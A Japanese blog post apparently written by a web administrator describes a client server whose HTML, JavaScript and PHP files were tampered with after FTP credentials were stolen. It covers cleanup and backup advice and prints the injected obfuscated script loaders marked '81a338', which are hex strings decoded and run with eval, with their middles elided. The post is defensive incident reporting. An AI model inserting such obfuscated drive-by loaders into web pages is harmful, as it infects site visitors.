WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

サブコンテンツ

危険な高額塾

タグ

既得権益 管理画面 配布 ツイッター Login LockDown 百度 流出 リンクシェイカー Ban Hammer IP force puzzle RSS Includes Pages レンタルサーバー ぼかし ネットショップ 滑らか バックアップ 久積篤史 office ブロックポリシー 宮田麗花 RMT 個人情報 ネットガレージ MasterCollection 土屋ひろし クラック Google Maps 人物 大西良幸 Adobe 高速ゲーム 改ざん moza EC 株式会社SRシステム Baidu High Concept Marketing ライン RSS Wordpress Content Slide トレンドアフィリエイト ツール getElementById グラデーション 表示 伊藤虎太郎 特権ビジネス ユーチューブマニアクス2017 document.all IBS wp-login.php 秒速で1億円稼ぐ男 CGI 伊藤 歩 関根義光 山下 音量アイコン 不正送信 大園式転売塾 Cash on Wordpress インターネットエクスプローラー バイマ html フレンドシップメール Tiger-Wing やしろひろたみ 副業術 81a338 レイアウト崩れ explorer twitter 株式会社バンザイ 無料 申請金ビジネス Diamond Affiliate Masters Program スカイプ 北川 雅嗣 DTD XHTML マルウエア YouTube Maniax 2017 レビュー Thunderbird SmoothScroll.js メモ Newpost Catch レイアウト がら空きビジネス system 新井浩 Chrome 短縮URL シャンプー ping ブラシ BUYMA ネットビジネス スタイルシート 大園麗花 復元 KMS認証 与沢翼×蝶乃舞 インターネットビジネススクール 不労所得の神 アンダーグラウンドメソッド 加藤 秀吉 スクロール ブロック ECサイト ウイルス ウインドウ バナー アクセスアップ 画像 Google Maps API 短縮URLツール 大園転売塾 ワードプレス 背景 マニュアル iphone クラウド入力機能 出店料 球体 エクスプローラー 特定のメールアドレス 加工 Agency Business ネオヒルズアカデミー 権利収入 切抜き 感染 蝶乃舞 管理ツール ネットゲーム 石井匠 アドセンス 株式会社A-ブログレス Firefox インフォトップ Windows ヤフオク FireWorks デスクトップ 掲示板 WP 詐欺組織 株式会社WINGOOD Favicon カスタマイズ IE 優先順位 自己アフィリエイト 量産 アレックス HTML4.0 コピーボタン アフィリエイト エクスチェンジ アイコン postpost ソース ネットビジネス最後の楽園 せどり @PAGES FTP ランキング アフィ匠 wordpress ロリポップ 株式会社SRシステム サイト改ざん エディタ メルマガ配信システム 自己アフィリ Yahoo ヤフーショッピング Youtube アンダーグラウンドアフィリエイトクラブ 固定ページ 秀吉塾天下統一 インターネット 無断送信 関根塾 立体 ライブチャット 詐欺 css ping送信 原田真 プラグイン スムーズ 上位表示 自動化 もざ テンプレート ヤフー クリックランキング Windows 7 ドメイン 高額塾 改竄 .htaccess Internet Explorer KMSpico Extension Manager ブルートフォースアタック 池田純矢 MT 小笠原健一 株式会社ニュース 無料オファー 定型文 SyntaxHighlighter MovableTYpe 到達率 マイクロソフト タイガーウイング セキュリティ 伊藤 虎太郎 google エキスパートメール レタープレス バイドゥー ソフト followmatic ムーバブルタイプ 株式会社Free Agent Style インペリアルゴールド ざくざく君 賢威 クロスアフィリエイト フォローマティック CS5 functions.php トレンドキーワード スマホ ボタン プロファイル テーマ タスクバー tool クラウド変換 SEO PPC getElementByTagName WEB LinkShaker ソースコード 自動 放射線 モザイク ビジネス wpXサーバー 日本語入力変換ソフト アクセス制限 Line BBIZ トラフィック 情報商材 村上省吾 三橋美仁 SKナレッジ アレックス式ネオせどりスクール ブラクラ 登録禁止 ライオンアフィリエイト 不正アクセス プロモーション 比較 与沢翼 ネットビジネス大全集 中山秀人 PHP パズル android 切り抜き CS6 サンタ ブラウザ 脆弱性 転売大園塾 ハート やしろ塾 伊藤塾 DOCTYPE ファビコン 個人情報流出 JavaScript

アーカイブ

エステトラブル

このページの先頭へ